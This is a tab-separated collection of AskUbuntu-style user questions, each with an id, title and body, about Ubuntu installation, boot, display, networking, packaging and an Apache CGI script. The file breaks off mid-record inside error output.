515502	how can i upgrade to lubuntu 14.04.1 withot a pae kernel ?	on my dell latitude d800 laptop , which has an old pentium m without pae support , i was able to successfully install lubuntu 14.04 from the cd . when i try to upgrade , i get the error : pae not enabled your system uses a cpu that does not have pae enabled . ubuntu only supports non-pae systems up to ubuntu 12.04 . to upgrade to a later version of ubuntu , you must enable pae ( if this is possible ) see : http : //help.ubuntu.com/community/enablingpae i have seen the communit wiki page for pae . the suggestion is to add forcepae to the command line options . when i do this , i get the same message . moreover , dmesg does not indicate pae was ever enabled . is there anything else i can ry to get lubuntu to upgrade correctly ?
515503	i can not print on windows 7 shared printer	for a while i can not print from my ubuntu 12.04 64 bit pc on a windows 7 shared printer . before that everything was ok . the printer is hp laserjet 1100 . the error message is : `` file `` /usr/lib/cups/backend/smb '' not available : no such file or directory '' i have tried to reinstall the samba , i have configured the workgroup properly . i have tried to reinstall the printer on the ubuntu machine with the proper address , or with lpd ( i have read somewhere ) . if i restart the printer on the cups web interface ( `` resume printer '' ) the problem seems to be solved , but not . ( the printer seems to be idle , and if i want to print , i still get the error message . ) i have checked the share rights on the windows 7 pc , and i think it is ok .
515508	soft lockups after install of 14.04	i have been successfully running ubuntu 12.04 ( dual boot with windows 7 ) on an acer aspire 7750 laptop for several years . last week i selected upgrade to 14.04 from the update tool . the 14.04 install ( linux kernel vmlinuz-3.13.0-34-generic ) produces 22 second soft lockups from xorg which results in the screen , mouse and keyboard freezing for about 20 seconds like clockwork . i did a backup of the ubuntu files , removed all ubuntu installs , repartitioned from windows , reinstalled 12.04 , installed all updates and then upgraded to 14.04 again . same result . selecting the vmlinuz-3.2.0-67-generic kernel from the grub menu the system seems to function properly . if i boot with vmlinuz-3.13.0-34-generic ( the new install ) , the screen ( mouse and keyboard ) freeze ( ~20 seconds active and ~20 seconds frozen ) . on shutdown from this condition , the system reports the soft lockup on one of the cpus and indicates that it is associated with xorg ( tainted ) . pardon my ignorance , but i have attempted to find a troubleshooting approach or a fix on the ubuntu sites , linux sites and on the internet in general with no luck . when the problem is existing , it is difficult to perform any file review since the functional windows are very short . i am able to get to a functional desktop with either the previous kernel ( 3.2.0-67 ) or by booting in recovery mode and failsafe graphics . any help would be appreciated . update - aug 25 2014 - i finally removed the upgraded ubuntu system and decided to start with a clean install of version 14.04 instead of upgrading from 12.04 . the first dvd startup disk with desktop 14.04 showed the same soft lockup performance . after some review , i found that the dvd was based on the 32 bit version of the desktop software . when i downloaded the 64 bit desktop version of 14.04 and started with a clean install of the 64 bit ubuntu , all worked well .
515509	wake on lan not working	i have been trying to get wake on lan to work on my ubuntu server ( 14.04.1 lts ) , which i have configured as a home nas box . i have followed several tutorials to try to get this working , but for some reason , which i ca n't trace , it is not working . the system is an old ( 4-5 year old ) shuttle pc system ( shuttle sn78sh7 ) , amd64 cpu ( amd athlon 64 x2 7550 ) . steps taken so far i have set wol on my bios i have enabled wol ( method g ) on eth0 i have added a script so that eth0 stays as g on startup i can confirm that the green and orange lights on the network card are on if i use ethtool , i can see the following , which i believe means it is configured as expected . supports wake-on : g wake-on : g i am using wolcmd ( from a mac ) , to send the magic packet , to the mac address , ip address , and subnet specified in ifconfig eth0 ( to port 9 ) . i am not sure what the next steps should be to try to resolve the problem . update i can confirm that wol does indeed work sometimes if i suspend ( pm-suspend ) , but does not if i use ( halt -p or shutdown -h now ) . suspend seems to be really unstable , so using that is not likely to be a good answer for me .
515512	lubuntu : neither shut-down nor restart works	ai have a freshly installed lubuntu 14.04.1 ( installed with forcepae option on a laptop with pentium m processor ) . the only problem that i have found so far is that i can not shut-down or restart the laptop . it always continues showing `` lubuntu '' and some dots . pressing esc it says wait-for-state stop/waiting * stopping rsync daemon rsync [ ok ] * asking all remaining processes to terminate… [ ok ] * killing all remaining processes… [ fail ] modemmanager [ 597 ] : < info > caught signal , shutting down… modemmanager [ 597 ] : < info > modemmanager is shut down nm-dispatcher.action : could not get the system bus . make sure the message bus daemon is running ! message : did not receive a reply . possible causes : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . * deactivating swap… [ ok ] * will now halt the cursor remains blinking but the only way to switch it off is to hold the power-off key pressed for some seconds . i tried sudo shutdown -h now , sudo halt and sudo poweroff resulting in the same problem . i also tried to add acpi=force in grub_cmdline_linux_default= '' quiet splash '' in /etc/default/grub and run sudo update-grub ; then , using the taskbar 's shot-down button lead to a direct stop of the laptop equal to holding the power-off key pressed for some seconds . next i followed the answer http : //askubuntu.com/a/202481/288322 . now , i directly receive some messages during shut-down starting wait-for-state stop/waiting * stopping rsync daemon rsync [ ok ] * asking all remaining processes to terminate… [ ok ] [ 240.944277 ] info : task kworker/0:2:24 : block for more than 120 seconds . [ 240.944461 ] tainted : g s 3.13.0-34-generic # 60-ubuntu [ 240.944623 ] `` echo 0 > /proc/sys/kernel/hung_tasks_timeout_secs '' disables this message . followed by some more similar lines and then : * killing all remaining processes… [ fail ] modemmanager [ 576 ] : < info > caught signal , shutting down… nm-dispatcher.action : caught signal 15 , shutting down ... modemmanager [ 576 ] : < info > modemmanager is shut down * deactivating swap… [ ok ] * will now halt [ 600.944276 ] info : task kworker/0:2:24 : block for more than 120 seconds . [ 600.944458 ] tainted : g s 3.13.0-34-generic # 60-ubuntu [ 600.944619 ] `` echo 0 > /proc/sys/kernel/hung_tasks_timeout_secs '' disables this message . then , nothing more was coming during the next 5 minutes . if you know where can i find relevant error information , i will be happy to search for them . following the advice below ( @ mintyfreshpenguin , http : //askubuntu.com/a/515799/288322 ) , i.e . using sudo halt -p leads to a similar messages during shut-down : wait-for-state stop/waiting * stopping rsync daemon rsync [ ok ] * asking all remaining processes to terminate… [ ok ] * killing all remaining processes… [ fail ] modemmanager [ 564 ] : < warn > could not acquire the 'org.freedesktop.modemmanager1 ' service name nm-dispatcher.action : caught signal 15 , shutting down ... modemmanager [ 564 ] : < info > modemmanager is shut down * deactivating swap… [ ok ] * will now halt [ 240.828234 ] info : task kworker/0:0:4 blocked for more than 120 seconds . [ 240.944461 ] tainted : g s 3.13.0-34-generic # 60-ubuntu [ 240.944623 ] `` echo 0 > /proc/sys/kernel/hung_tasks_timeout_secs '' disables this message . the last message [ 240.xxxxxx ] info : is repeated for : task upowerd:1352 task halt:2081 task kworker:0:0:4 for [ 360.xxxxxx ] , [ 480.xxxxxx ] , [ 600.xxxxxx ] and perhaps even longer , but after [ 600.xxxxxx ] info : task kworker/0:0:4 blocked for more than 120 seconds came no more message for 10 minutes and i pressed the power-off button for some seconds .
515515	1min+ boot time . bootchart linked	this is my first post , let me know if more information is needed or if i presented it poorly . i 'm running a latitude | e6410 on 14.04 with nvidia graphics . i have uploaded the bootchart image as you can see below . i honestly have no clue what any of this means , and i was hoping for some recommendations to reduce my boot time . if you 're aware of literature regarding this matter that would be totally awesome too ! in addition to this , upon every restart or log-out , the login screen is purple for nearly a second before swapping back to the homescreen image ? unsure if this an unrelated bug or symptom of my poor boot time . boot image
515516	downloaded 14.04 but get system program problem detected , wo n't run	i downloaded and installed ubuntu 14.04 on an older version , either 11.04 or 12.04 i get a box that says `` system program problem detected '' and then it crashes or goes blank .
515517	i cant access ubuntu from windows 7	i read and followed easy install instructions for sharing files with ubuntu . i have three computers , windows 7 64-bit home premium , windows vista and ubuntu 14.04 lts . my problem is that i cant access ubuntu . when i open explorer , go to network , i can see all three computers but as soon as i click on ubuntu box appears . it says : windows can not access \ ( my computer name here ) ... what should i do ?
515519	why is it that whenever i visit almost any high profile site it asks me to install something ?	when i go to facebook.com my browser says to install facebook messenger , youtube asks me to install youtube and android authority and such ask to install some ... something . when i say i do want to install it it does n't do anything so it has really become just some annoying popup . is there some way i can change this ? why is it doing it in the first place ?
515526	hello all . can i install from an external cd player	i am completely new to ubuntu , and want to check it out , so i decided to install it momentarily along windows 7 , on my acer extensa 5635z . at first , i though of trying the windows installer and install it from windows itself , but i ca n't find the installer on the website , so i 'm currently downloading the iso file , which i will burn with imgburn . however , the internal cd player of my laptop is n't working , and it 's been taken out..it 's currently at a friends house , as he wants to see if he can fix it . in the meantime , i have an external samsung cd/dvd player . will i be able to boot from that external cd player ( i hope so ) if not , any alternative ideas ?
515529	gtk-message : failed to load module `` unity-gtk-module '' ubuntu 14.04	i installed ubuntu 14.04 recently on my computer . after i followed this link to install adobe pdf reader , ever time i use xdg-open to open a pdf file , there are tons of message showing on my screen : ( acroread : 31045 ) : gtk-warning ** : unable to locate theme engine in module_path : `` murrine '' , there are also two lines of messages : gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed t0 load module `` unity-gtk-module '' i tried this link and this link . and i tried the bash command export ld_library_path= $ ld_library_path : /usr/lib/x86_64-linux-gnu/gtk-2.0/modules/ following this link . none of them work . the pdf files cold be opened , but these tons of warnings are annoying . could anyone tell me how to eliminate these messages ? thanks !
515531	leafpad saying i 'm not root	ok so i 'm trying to decrease my swappiness and trying to access the script via leafpad but when i run the command gksudo /etc/sysctl.conf i get this warning ( leafpad:3738 ) : ibus-warning ** : the owner of /home/cerberus/.config/ibus/bus is not root ! i 'm not sure how this is happening since i just installed 14.04.1 lts i 'm a newb so any help is appreciated !
515535	setting up partitions when installing ubuntu 14.04.1	i have a 2 terabyte sata drive : the first partition is a 100 mb system reserved . the second is a primary partition 18.58 gb . it has no description and no options on right click . everything is greyed out . is that a restore partition ? the third partition is a 745 gb c drive healthy boot page file win 7 partition . the forth partition is a storage area 1099 gb . should i start by shrinking c-drive to lets say 150 gb ? if i do what is the next step . i have downloaded a 14.04.1 iso file . i can put that on a usb or dvd . after shrink windows 7 partition should i create another partition for ubuntu or will i take care of that during install ? what about any other partitions i might want to make or need ? thank you for all the help .
515537	apache2 virtualhost going to default directory	i have a default virtual host conf file for apache2 , and have copied it to mysite.com.conf and changed the nameserver and directory . but when i go to mysite.com it stills shows the default directory content ? any ideas how to debug this ? im at ubuntu 14.04 .
515541	convert website to webapps ( html5 based ) - ubuntu-sdk	how are you today ? ? i am working on ubuntu-sdk and found that ubuntu -- > webapps , which we can use for converting websites into standalone application , does it mean that i can run the application on local system ? ? and it is platform independent means i can run the same application over windows , linux and mac/ios , mobiles , tablets , ipads , etc . is it true ? ? if yes.. please advice me the steps which i need to follow to convert my locally designed application to standalone application , ( e.g i have developed an webiste running locally , i want to convert it to standalone application ) , please help thanks in advance
515543	weird screen freeezes when trying to boot after installation	http : //youtu.be/gtpqazzl-xm i just installed ubuntu on an old computer and whenever i boot it this happens . if someone could help that would be great . thanks !
515544	dual-monitor seems to be default in ubuntu 14.04 , and i try to solve it , but close the wrong monitor	i 'm using ubuntu 14.04 lts . my mouse goes outside the screen when moving to the right edge , so i guess something wrong with my monitor setting . lt seemed that `` dual monitor '' was set as default setting . i ran the monitor app trying to turn off the virtual monitor , but i chose the wrong one and turned off the one i was using . all of a sudden , the screen became totally black . i then switched to my second workspace ( ctrl+alt+f2 then startx ) . it worked fine . ( all six workspaces worked expect the last one ) i read this article and tried the first solution - save xrandr commands in /.xprofile . i tried it in the following steps : in order to set monitors by clicking mouse , i connected another monitor to my computer . i set my monitors right and save the xrandr command in ~/.xprofile unplug the monitor and reboot my computer nothing changed but i found ... when connected-on this additional monitor , i saved the content of xrandr as /.xprofile . i then disconnected physically the monitor and reboot my computer . but when i look again at xrandr and /.xprofile after rebooting , there are slight differences between these two . the numeration is changed . i wonder if the system numerates my outputs automatically so that it can not detect and match the right one . this is what my /.xprofile looks like : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds2 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 310mm x 174mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) lvds-1-0 connected 1366x768 60.0 + 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 hdmi-1-0 disconnected vga-1-0 disconnected 1366x768 ( 0x49 ) 72.0mhz h : width 1366 start 1414 end 1446 total 1516 skew 0 clock 47.5khz v : height 768 start 771 end 776 total 792 clock 60.0hz and my xrandr : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 310mm x 174mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) lvds-1-1 connected 1366x768 60.0 + 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 hdmi-1-0 disconnected vga-1-1 disconnected 1366x768 ( 0x49 ) 72.0mhz h : width 1366 start 1414 end 1446 total 1516 skew 0 clock 47.5khz v : height 768 start 771 end 776 total 792 clock 60.0hz also , i’m so confused . why are lvds1 and lvds-1-1 both connected ? and i’m sure lvds1 is the one i’m using , since trying to rotate it works , but lvds-1-1 doesn’t . does anyone know what 's wrong with my steps ? or other method to set back my monitor ?
515545	why do i have a red stop sign at the right top of my screen ?	i have this red stop sign at the top , i ca n't get rid of it , when i click it , it says : '' an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'error : opening the cache ( e : could not opent file /var/cache/apt/srcpkgcache.bin - open ( 13 : permission denied ) , e : the package lists or status file could not be parsed or opened . ) 'this usually means that your installed packages have unmet dependencies '' also , my software center does n't work anymore and i ca n't open the software updater either . and i ca n't open any more downloaded games that used to work . i really do n't know much about computers so if someone could give me an explanation for dummies i would be very grateful . thank you : )
515547	ubuntu not showing progress bar while installing	i have been struggling to properly install ubuntu . after creating all the partitions , and setting up things they way they are supposed to be set , i clicked on `` install now '' and it started the process . the thing is that while is installing i can see the `` install '' dialog with the different pictures , but i ca n't see in the bottom of the page the progress bar or console . at this point , more than 30 minutes have passed since i started to install it and i am not sure if it is actually installing and not showing anything , or its simply stuck and it wont install . if you guys can provide any advice , it will be very appreciated . thanks in advance . abraham
515548	belkin n300 router ssid not recognised/listed	i am using belkin wireless n300 router , model nof9k100v1 router . i have dual boot windows 7 and ubuntu 12.04 . pptp is configured internally in the router . on windows and android , i can connect and work flawlessly without a problem but when i boot ubuntu , ssid is not showing up in the list . i searched a lot and could not find any nearest solution or fix for this . p.s . i am using belkin wireless router not an belkin usb wireless adapter .
515549	virtualbox resolution	here is another question in my adventure with virtualbox . i have windows 7 installed in the box within ubuntu 14.04 . i can not get it into full screen . when i go to resolution settings in windows , the maximum resolution offered for the guest is lower than the resolution of the host . is there a way to adjust this ?
515550	need to copy firmware files at /usr/lib to /lib using terminal	i have a cubox-i4pro and i 'm running xubuntu on it . in order to get wi-fi working i have to copy the firmware folder `` brcm '' from /usr/lib/firmware/brcm and make the folder /lib/firmware/brcm . refer to the article here . http : //www.solid-run.com/community/topic1269.html after that , i have to do other stuff . if i may get some help so that i can use wi-fi on my cubox-ipro that would be great . i have to do all this as root so i have to do it all from the terminal . thanks . : ) p.s . i already know how to get to root . ( in the terminal ) is there a way to log in as root so that i can do these things using the dekstop ? there is no root login on the login screen . xd all comments are appreciated . edit : i also need help with the rest of the steps . this step has been solved .
515553	ubuntu server 14.04 wo n't boot	i 've installed ubuntu server 14.04 with a usb drive , the setup goes fine but when it tells be to remove the usb and it reboots it fails to boot . but it boots fine when the usb is in .
515555	open apps can not be activated after a while	i just bought a system 76 kudu pro with ubuntu 14.04 preinstalled . when i have a few applications open and have n't used some of them for a while and want to use them again , it wo n't work . the apps are still in the launcher and are visible in alt-tab but when i click on them or alt-tab to them , nothing happens . i can open this application again but then i would have to start over with my work ... does anybody know what this can be ?
515561	recovering from apt-get upgrade gone wrong due to a full disk	i was performing an apt-get upgrade on an ubuntu 12.04.5 lts box that had n't been updated in a little while and the upgrade failed due to 'no space left on device ' . after a little while i worked out space meant inodes and i have freed some up but unfortunately things have been left something askew . i have tried manually installing the old versions of packages mentioned using dpkg -i but that does n't help . i have tried apt-get upgrade and apt-get -f install to no avail . results are below . any ideas how to fix things up ? fixed : installing the earlier versions again manually via dpkg -i and then apt-get -f install has done the trick . not sure why this did n't work the first time . the packages in question are listed below but they will presumably vary . libssl1.0.0_1.0.1-4ubuntu5.14_i386.deb linux-headers-3.2.0-64-generic-pae_3.2.0-64.97_i386.deb linux-image-generic-pae_3.2.0.64.76_i386.deb linux-headers-3.2.0-64_3.2.0-64.97_all.deb linux-headers-generic-pae_3.2.0.64.76_i386.deb root @ unlinked : /tmp # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run âapt-get -f installâ to correct these . the following packages have unmet dependencies . libssl-dev : depends : libssl1.0.0 ( = 1.0.1-4ubuntu5.14 ) but 1.0.1-4ubuntu5.17 is installed linux-generic-pae : depends : linux-image-generic-pae ( = 3.2.0.64.76 ) but 3.2.0.67.79 is installed depends : linux-headers-generic-pae ( = 3.2.0.64.76 ) but 3.2.0.67.79 is installed e : unmet dependencies . try using -f. root @ unlinked : /tmp # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-43-generic-pae linux-headers-3.2.0-38-generic-pae linux-headers-3.2.0-41-generic-pae linux-headers-3.2.0-36-generic-pae linux-headers-3.2.0-63-generic-pae linux-headers-3.2.0-58-generic-pae linux-headers-3.2.0-60-generic-pae linux-headers-3.2.0-55-generic-pae linux-headers-3.2.0-40 linux-headers-3.2.0-41 linux-headers-3.2.0-36 linux-headers-3.2.0-37 linux-headers-3.2.0-43 linux-headers-3.2.0-38 linux-headers-3.2.0-44 linux-headers-3.2.0-39 linux-headers-3.2.0-45 linux-headers-3.2.0-51 linux-headers-3.2.0-52 linux-headers-3.2.0-53 linux-headers-3.2.0-48 linux-headers-3.2.0-54 linux-headers-3.2.0-60 linux-headers-3.2.0-55 linux-headers-3.2.0-61 linux-headers-3.2.0-56 linux-headers-3.2.0-57 linux-headers-3.2.0-63 linux-headers-3.2.0-58 linux-headers-3.2.0-59 linux-headers-3.2.0-52-generic-pae linux-headers-3.2.0-44-generic-pae linux-headers-3.2.0-39-generic-pae linux-headers-3.2.0-37-generic-pae linux-headers-3.2.0-59-generic-pae linux-headers-3.2.0-61-generic-pae linux-headers-3.2.0-56-generic-pae linux-headers-3.2.0-53-generic-pae linux-headers-3.2.0-48-generic-pae linux-headers-3.2.0-45-generic-pae linux-headers-3.2.0-40-generic-pae linux-headers-3.2.0-57-generic-pae linux-headers-3.2.0-54-generic-pae linux-headers-3.2.0-51-generic-pae use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libssl-dev linux-generic-pae the following packages will be upgraded : libssl-dev linux-generic-pae 2 to upgrade , 0 to newly install , 0 to remove and 0 not to upgrade . 2 not fully installed or removed . need to get 0 b/1,427 kb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of libssl-dev : libssl-dev depends on libssl1.0.0 ( = 1.0.1-4ubuntu5.14 ) ; however : version of libssl1.0.0 on system is 1.0.1-4ubuntu5.17 . dpkg : error processing libssl-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.64.76 ) ; however : version of linux-image-generic-pae on system is 3.2.0.67.79. linux-generic-pae depends on linux-headers-generic-pae ( = 3.2.0.64.76 ) ; however : version of linux-headers-generic-pae on system is 3.2.0.67.79. dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . errors were encountered while processing : libssl-dev linux-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 )
515562	apply ubuntu in university	i work in project to apply ubuntu client in all computer in my university . can you help my to know the steps to do it ?
515563	poor performance after installing graphic driver	i have installed ubuntu 14.04 . i have checked all the hardware requirements and i meet them . i was using ubuntu for 2 days and it was as quick as usain bolt . today i wanted to improve graphic so i have installed nvidia driver for my geforce 6200 card . now i got so bad performance that when i tried to open qtcreator i get info : sorry , the program `` qtcreator '' closed unexpectedlly . your computer does not have enough free memory to automatically analyze the problem and send a report to developers . every simple application needs about 10-15 sec to start running . i have no idea what has happened and how to solve it . i am newbie to linux .
515564	edubuntu 12.04 freezes at login window	i upgraded my edubuntu distribution to 12.04 and when i got to the last step , which was to remove no longer needed packages , i skipped it and continued . my computer restarted as it should but once it got to the login window it froze . my cursor could still move but everything else was frozen . the time did not update , i could not enter my password and everything else was frozen . thinking maybe there was a hardware problem , i started my windows 8 partition but on startup it said it was scanning and repairing disk c : i do n't have much experience with problems like this so any help would be great and if more information is need i can likely find it .
515565	unable to delete or copy files from/on an mp4 player	i was wondering about how t fix the following problem : i have an mp4 player and connect it to my laptop where i have ubuntu 12.04 . i connect it using an usb cable if that makes any difference . it appears as a media device and i can open it but i ca n't delete or copy anything . it tells me it 's read only . i tried to chmod 777 but it did n't work . does anyone have any idea ? thanks !
515566	compize fixed workspace sometimes not work with commandline program start	first thing i always do on fresh ubuntu , is enable workspace , download compiz , make workspace wall 4x4 and pin specific programs to specific workspaces . it 's great , but not alweys look the way i want . i 'm not sure why : alias . i open file `` change.odt '' almost every time i 'm doing something . so i did `` alias abs= '' libreoofice path_to_file '' . great ! it 's working ! but it 's opening in workspace i 'm already in , not in workspace i pinned libre office to . run something with options . for example : emacs filename work great , but emacs fullscreen filename ( or even without filename ) open editor in workspace i 'm already in . option form other program . i guess it 's same problem as 2 . i had got some other program ( like myunity or daemon ? something like that was working ... actually not working , so i stopped using this ) and i could use `` fullscreen '' with for example emacs . never worked fullscreen with fixed workspace . ccms fullscreen . right now i ca n't find this option ( it was deleted ? i was sure it was in `` windows management '' ) but i could make window open in fullscreen like i can make window open i specific workspace . but again - it did n't work with for example - emacs . rhythmbox is not work with ccms workspace placement . ok , it work now . but it did n't for me in 12.04 so i put it on the list , to have all in one place . and it did n't work without other option . rhythmbox just doing it on his own way , i was sure he is opening in random workspace . ok , that 's all right now . anyone know , how to make programs open in specific workspace and with option i want ( fullscreen , smallcreen , black , white , anything ) and via alias ? thank you for answer .
515567	how to push ( sync ) from local repository to my google drive using grive client on ubuntu ?	i would like to push changes from my local google drive to cloud . how to sync this way ? thank you .
515568	ubuntu server spontaneous reboot	i have got two ubuntu 12.04 servers ( xeon e3 ) . sometimes ( several days ) each server spontaneously reboots . hdds and other hardware are ok . which logfile can help find a reason of the problem ? updated . hardware : xeon e3 processor , intel server motherboard , 32gb ddr3 ecc , mdadm mirror hdd raid for system , mdadm ssd raid for database ( postgres ) . both servers have similar ( not identical ) components . smart is ok . it seems that the problem is in the software . python process and database are running on this servers . syslog ( time of reboot ) : aug 23 13:42:23 xeon hddtemp [ 1411 ] : /dev/sdc : wdc wd15npvt-00z2tt0 : 34 c aug 23 13:42:23 xeon hddtemp [ 1411 ] : /dev/sdd : wdc wd15npvt-00z2tt0 : 34 c aug 23 13:43:24 xeon hddtemp [ 1411 ] : /dev/sdc : wdc wd15npvt-00z2tt0 : 34 c aug 23 13:43:24 xeon hddtemp [ 1411 ] : /dev/sdd : wdc wd15npvt-00z2tt0 : 34 c aug 23 13:44:14 xeon sensord : chip : acpitz-virtual-0 aug 23 13:44:14 xeon sensord : adapter : virtual device aug 23 13:44:14 xeon sensord : temp1 : 27.8 c aug 23 13:44:14 xeon sensord : temp2 : 29.8 c aug 23 13:44:14 xeon sensord : chip : coretemp-isa-0000 aug 23 13:44:14 xeon sensord : adapter : isa adapter aug 23 13:44:14 xeon sensord : physical id 0 : 37.0 c aug 23 13:44:14 xeon sensord : core 0 : 37.0 c aug 23 13:44:14 xeon sensord : core 1 : 37.0 c aug 23 13:44:14 xeon sensord : core 2 : 37.0 c aug 23 13:44:14 xeon sensord : core 3 : 37.0 c aug 23 13:44:24 xeon hddtemp [ 1411 ] : /dev/sdc : wdc wd15npvt-00z2tt0 : 34 c aug 23 13:44:24 xeon hddtemp [ 1411 ] : /dev/sdd : wdc wd15npvt-00z2tt0 : 34 c aug 23 13:47:01 xeon kernel : imklog 5.8.6 , log source = /proc/kmsg started . aug 23 13:47:01 xeon rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 582 '' x-info= '' http : //www.rsyslog.com '' ] start aug 23 13:47:01 xeon rsyslogd : rsyslogd 's groupid changed to 103 aug 23 13:47:01 xeon rsyslogd : rsyslogd 's userid changed to 101 aug 23 13:47:00 xeon rsyslogd-2039 : could not open output pipe '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ] aug 23 13:47:01 xeon kernel : [ 0.000000 ] initializing cgroup subsys cpuset aug 23 13:47:01 xeon kernel : [ 0.000000 ] initializing cgroup subsys cpu aug 23 13:47:01 xeon kernel : [ 0.000000 ] initializing cgroup subsys cpuacct aug 23 13:47:01 xeon kernel : [ 0.000000 ] linux version 3.11.0-26-generic ( buildd @ komainu ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 45~precise1-ubuntu smp tue jul 15 04:02:35 utc 2014 ( ubuntu 3.11.0-26.45~precise1-generic 3.11.10.12 ) aug 23 13:47:01 xeon kernel : [ 0.000000 ] command line : boot_image=/boot/vmlinuz-3.11.0-26-generic root=uuid=0daa7f53-6c74-47d2-873e-ebd339cd39b0 ro splash quiet vt.handoff=7 aug 23 13:47:01 xeon kernel : [ 0.000000 ] kernel supported cpus : aug 23 13:47:01 xeon kernel : [ 0.000000 ] intel genuineintel aug 23 13:47:01 xeon kernel : [ 0.000000 ] amd authenticamd aug 23 13:47:01 xeon kernel : [ 0.000000 ] centaur centaurhauls aug 23 13:47:01 xeon kernel : [ 0.000000 ] e820 : bios-provided physical ram map : aug 23 13:47:01 xeon kernel : [ 0.000000 ] bios-e820 : [ mem 0x0000000000000000-0x000000000009bbff ] usable aug 23 13:47:01 xeon kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000000009bc00-0x000000000009ffff ] reserved dmseg - nothing strange .
515570	http request to cgi python script successful , but the script does n't seem to run [ solved ]	i have configured cgi scripts for my apache2 web server . here is what i want to do : client uploads the image to the server . ( this already works ) on success , i want to execute the python script to resize the image . i tried the following and the success function does execute but my python script does not seem to execute : javascript code that sends the request : var input = document.getelementbyid ( 'imageloader ' ) ; imagename = input.value ; var file = input.files [ 0 ] ; if ( file ! = undefined ) { formdata= new formdata ( ) ; console.log ( formdata.length ) ; if ( ! ! file.type.match ( /image . */ ) ) { formdata.append ( `` image '' , file ) ; $ .ajax ( { url : `` upload.php '' , type : `` post '' , processdata : false , contenttype : false , success : function ( ) { var input = document.getelementbyid ( 'imageloader ' ) ; imagename = input.value ; var file = input.files [ 0 ] ; formdata = new formdata ( ) ; formdata.append ( `` filename '' , file ) ; $ .ajax ( { url : `` http : //localhost/main/cgi-bin/resize.py '' , type : `` post '' , data : formdata , processdata : false , contenttype : false , success : function ( data ) { console.log ( data ) ; } } ) ; // code continues ... resize.py : # ! /usr/bin/python import cgi import cgitb import image cgitb.enable ( ) data = cgi.fieldstorage ( ) filename = data.getvalue ( `` filename '' ) im = image.open ( `` ../js/upload/ '' + filename ) ( width , height ) = im.size maxwidth = 600 maxheight = 400 if width > maxwidth : d = float ( width ) / maxwidth height = int ( height / d ) width = maxwidth if height > maxheight : d = float ( height ) / maxheight width = int ( width / d ) height = maxheight size = ( width , height ) im = im.resize ( size , image.antialias ) im.save ( `` ../js/upload/ '' + filename , quality=100 ) this is the apache2.conf : < directory /var/www/html/main/cgi-bin > allowoverride none options +execcgi sethandler cgi-script addhandler cgi-script .py .cgi order allow , deny allow from all < /directory > cgi-bin and python script file permissions : drwxrwxr-x 2 mou mou 4096 aug 24 03:28 cgi-bin -rwxrwxrwx 1 mou mou 1673 aug 24 03:28 resize.py edit : executing this code $ .ajax ( { url : `` http : //localhost/main/cgi-bin/resize.py '' , type : `` post '' , data : formdata , // formdata = { `` filename '' : `` the filename which was saved in a variable whie the image was uploaded '' } processdata : false , contenttype : false , success : function ( data ) { alert ( data ) ; } } ) ; it alerts the following : < body bgcolor= '' # f0f0f8 '' > < font color= '' # f0f0f8 '' size= '' -5 '' > -- > < body bgcolor= '' # f0f0f8 '' > < font color= '' # f0f0f8 '' size= '' -5 '' > -- > -- > < /font > < /font > < /font > < /script > < /object > < /blockquote > < /pre > < /table > < /table > < /table > < /table > < /table > < /font > < /font > < /font > < body bgcolor= '' # f0f0f8 '' > < table width= '' 100 % '' cellspacing=0 cellpadding=2 border=0 summary= '' heading '' > < tr bgcolor= '' # 6622aa '' > < td valign=bottom > & nbsp ; < br > < font color= '' # ffffff '' face= '' helvetica , arial '' > & nbsp ; < br > < big > < big > < strong > & lt ; type 'exceptions.typeerror ' & gt ; < /strong > < /big > < /big > < /font > < /td > < td align=right valign=bottom > < font color= '' # ffffff '' face= '' helvetica , arial '' > python 2.7.6 : /usr/bin/python < br > sun aug 24 17:24:15 2014 < /font > < /td > < /tr > < /table > < p > a problem occurred in a python script . here is the sequence of function calls leading up to the error , in the order they occurred. < /p > < table width= '' 100 % '' cellspacing=0 cellpadding=0 border=0 > < tr > < td bgcolor= '' # d8bbff '' > < big > & nbsp ; < /big > < a href= '' file : ///var/www/html/main/cgi-bin/resize.py '' > /var/www/html/main/cgi-bin/resize.py < /a > in < strong > < module > < /strong > ( ) < /td > < /tr > < tr > < td > < font color= '' # 909090 '' > < tt > & nbsp ; & nbsp ; < small > & nbsp ; & nbsp ; & nbsp ; 10 < /small > & nbsp ; < br > < /tt > < /font > < /td > < /tr > < tr > < td > < font color= '' # 909090 '' > 